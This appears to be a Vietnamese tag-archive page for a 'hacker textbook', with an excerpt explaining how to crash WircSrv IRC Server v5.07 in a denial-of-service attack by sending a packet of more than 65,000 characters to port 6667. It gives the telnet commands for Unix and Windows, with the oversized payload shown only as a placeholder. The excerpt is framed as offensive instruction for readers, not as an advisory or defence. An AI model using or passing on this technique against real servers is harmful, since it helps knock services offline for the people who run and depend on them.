Trang chủ » Tag Archives: Giáo trình Hacker

Tag Archives: Giáo trình Hacker

Giáo trình Hacker

Giáo trình Hacker Xem Tải xuống Kỹ thuật tấn công DoS vào WircSrv Irc Server v5.07 : WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667. Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667: Nếu bạn dùng Unix:[hellme@die­communitech.net$ telnet irc.example.com 6667 Trying example.com. Connected to example.com. Escape character is `^]`.[buffer] Windows cũng tương tự: telnet irc.example.com 6667 Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự  Xem thêm »